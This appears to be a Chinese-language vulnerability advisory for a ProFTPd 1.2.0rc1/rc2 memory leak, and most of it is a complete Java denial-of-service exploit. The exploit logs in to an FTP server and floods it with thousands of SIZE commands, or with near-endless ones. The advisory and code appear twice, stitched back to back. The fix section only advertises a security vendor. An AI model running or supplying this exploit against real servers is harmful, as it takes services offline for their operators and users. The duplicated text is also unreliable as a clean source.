涉及程序:
ProFTPd
描述:
ProFTPd 内存泄露引起拒绝服务攻击
详细:
ProFTPd 是一款非常流行的 FTP 服务器。发现它存在一个安全漏洞,允许恶意用户对它进行拒绝服务攻击。
当 ProFTPd 执行 SIZE FTP 命令时会引起内存泄露漏洞,如果发送大约5000次 SIZE FTP 命令到服务器中可能引起 ProFTPd 耗费超过300KB的内存。如果发送更多的SIZE 命令将引起拒绝服务攻击。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
*/
import java.net.*;
import java.io.*;
class TCPconnection {
public TCPconnection (String hostname, int portnumber) throws Exception {
Socket s = doaSocket(hostname, portnumber);
br = new BufferedReader (new InputStreamReader (s.getInputStream()));
ps = new PrintStream (s.getOutputStream());
}
public String readLine() throws Exception {
String s;
try { s = br.readLine(); }
catch (IOException ioe) {
System.out.println("TCP Error ... it's a little hax0r exception ;-)");
throw new Exception ("/nInput Error: I/O Error");
}
return s;
}
public void println(String s) {
ps.println(s);
}
private Socket doaSocket(String hostname, int portnumber) throws Exception {
Socket s = null;
int attempts = 0;
while (s == null && attempts<maxattempts) {
try { s = new Socket(hostname, portnumber); }
catch (UnknownHostException uhe) {
System.err.println("It was no posible to establish the TCP connection./n" + "Reason: unknown hostname " + hostname + ". Here is the Exception:");
throw new Exception("/nConnection Error: " + "unknown hostname");
}
catch (IOException ioe) {
System.err.println("The connection was not accomplished due to an I/O Error: trying it again ...");
}
attempts++;
}
if (s == null) throw new IOException("/nThe connection was not accomplished due to an I/O Error: trying it again ...");
else return s; }
private final int maxattempts = 5;
private BufferedReader br;
private PrintStream ps;
}
class proftpDoS {
public static void main(String[] arg) throws Exception {
InputStreamReader isr;
BufferedReader tcld;
String hostnamez, username, password, file, s1, option;
int i, j, k;
isr = new InputStreamReader(System.in);
tcld = new BufferedReader(isr);
System.out.println("ProFTPd DoS by JeT-Li -The Wushu Master-");
System.out.println("Code in an attempt to solve Fermat Last's Theoreme");
hostnamez = "";
while (hostnamez.length()==0) {
System.out.print("Please enter the hostname/IP: ");
hostnamez = tcld.readLine(); }
username = "";
while (username.length()==0) {
System.out.print("Enter the username: ");
username = tcld.readLine(); }
password = "";
while (password.length()==0) {
System.out.print("Enter the password for that username: ");
password = tcld.readLine(); }
file = "";
while (file.length()==0) {
System.out.print("Enter a valid filename on the FTP /n(with correct path of course ;-): ");
file = tcld.readLine(); }
System.out.println("Choose one of this options; insert only the NUMBER, i.e.: 1");
System.out.println("1) Request 10000 size's to the server (it may be enough)");
System.out.println("2) /"No pain no gain/" (pseudo-eternal requests, ey it may be harm ;-P)");
System.out.print("Option: ");
option = tcld.readLine();
k = Integer.parseInt(option);
while (!(k==1 || k==2)) {
System.out.print("Option not valid, please try again: ");
option = tcld.readLine();
k = Integer.parseInt(option); }
TCPconnection tc = new TCPconnection(hostnamez, 21);
tc.println("user " + username);
tc.println("pass " + password);
if (k==1) {
for(i=0;i<10000;i++)
tc.println("size " + file); }
else if (k==2) {
for(i=1;i<100;i++)
for(j=2;j<((int)Math.pow(j,i ));j++)
tc.println("size " + file); }
tc.println("quit");
s1 = tc.readLine();
while (s1!=null) {
s1 = tc.readLine();
System.out.println("Attack completed ... as one of my friends says:");
System.out.println("Hack just r0cks ;-)");
}
}
}
受影响的系统:
ProFTPd 1.2.0rc1
ProFTPd 1.2.0rc2
解决方案:
CNNS 为您提供完善的网络安全服务。
ProFTPd
描述:
ProFTPd 内存泄露引起拒绝服务攻击
详细:
ProFTPd 是一款非常流行的 FTP 服务器。发现它存在一个安全漏洞,允许恶意用户对它进行拒绝服务攻击。
当 ProFTPd 执行 SIZE FTP 命令时会引起内存泄露漏洞,如果发送大约5000次 SIZE FTP 命令到服务器中可能引起 ProFTPd 耗费超过300KB的内存。如果发送更多的SIZE 命令将引起拒绝服务攻击。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
*/
import java.net.*;
import java.io.*;
class TCPconnection {
public TCPconnection (String hostname, int portnumber) throws Exception {
Socket s = doaSocket(hostname, portnumber);
br = new BufferedReader (new InputStreamReader (s.getInputStream()));
ps = new PrintStream (s.getOutputStream());
}
public String readLine() throws Exception {
String s;
try { s = br.readLine(); }
catch (IOException ioe) {
System.out.println("TCP Error ... it's a little hax0r exception ;-)");
throw new Exception ("/nInput Error: I/O Error");
}
return s;
}
public void println(String s) {
ps.println(s);
}
private Socket doaSocket(String hostname, int portnumber) throws Exception {
Socket s = null;
int attempts = 0;
while (s == null && attempts<maxattempts) {
try { s = new Socket(hostname, portnumber); }
catch (UnknownHostException uhe) {
System.err.println("It was no posible to establish the TCP connection./n" + "Reason: unknown hostname " + hostname + ". Here is the Exception:");
throw new Exception("/nConnection Error: " + "unknown hostname");
}
catch (IOException ioe) {
System.err.println("The connection was not accomplished due to an I/O Error: trying it again ...");
}
attempts++;
}
if (s == null) throw new IOException("/nThe connection was not accomplished due to an I/O Error: trying it again ...");
else return s; }
private final int maxattempts = 5;
private BufferedReader br;
private PrintStream ps;
}
class proftpDoS {
public static void main(String[] arg) throws Exception {
InputStreamReader isr;
BufferedReader tcld;
String hostnamez, username, password, file, s1, option;
int i, j, k;
isr = new InputStreamReader(System.in);
tcld = new BufferedReader(isr);
System.out.println("ProFTPd DoS by JeT-Li -The Wushu Master-");
System.out.println("Code in an attempt to solve Fermat Last's Theoreme");
hostnamez = "";
while (hostnamez.length()==0) {
System.out.print("Please enter the hostname/IP: ");
hostnamez = tcld.readLine(); }
username = "";
while (username.length()==0) {
System.out.print("Enter the username: ");
username = tcld.readLine(); }
password = "";
while (password.length()==0) {
System.out.print("Enter the password for that username: ");
password = tcld.readLine(); }
file = "";
while (file.length()==0) {
System.out.print("Enter a valid filename on the FTP /n(with correct path of course ;-): ");
file = tcld.readLine(); }
System.out.println("Choose one of this options; insert only the NUMBER, i.e.: 1");
System.out.println("1) Request 10000 size's to the server (it may be enough)");
System.out.println("2) /"No pain no gain/" (pseudo-eternal requests, ey it may be harm ;-P)");
System.out.print("Option: ");
option = tcld.readLine();
k = Integer.parseInt(option);
while (!(k==1 || k==2)) {
System.out.print("Option not valid, please try again: ");
option = tcld.readLine();
k = Integer.parseInt(option); }
TCPconnection tc = new TCPconnection(hostnamez, 21);
tc.println("user " + username);
tc.println("pass " + password);
if (k==1) {
for(i=0;i<10000;i++)
tc.println("size " + file); }
else if (k==2) {
for(i=1;i<100;i++)
for(j=2;j<((int)Math.pow(j,i ));j++)
tc.println("size " + file); }
tc.println("quit");
s1 = tc.readLine();
while (s1!=null) {
s1 = tc.readLine();
System.out.println("Attack completed ... as one of my friends says:");
System.out.println("Hack just r0cks ;-)");
}
}
}
受影响的系统:
ProFTPd 1.2.0rc1
ProFTPd 1.2.0rc2
解决方案:
CNNS 为您提供完善的网络安全服务。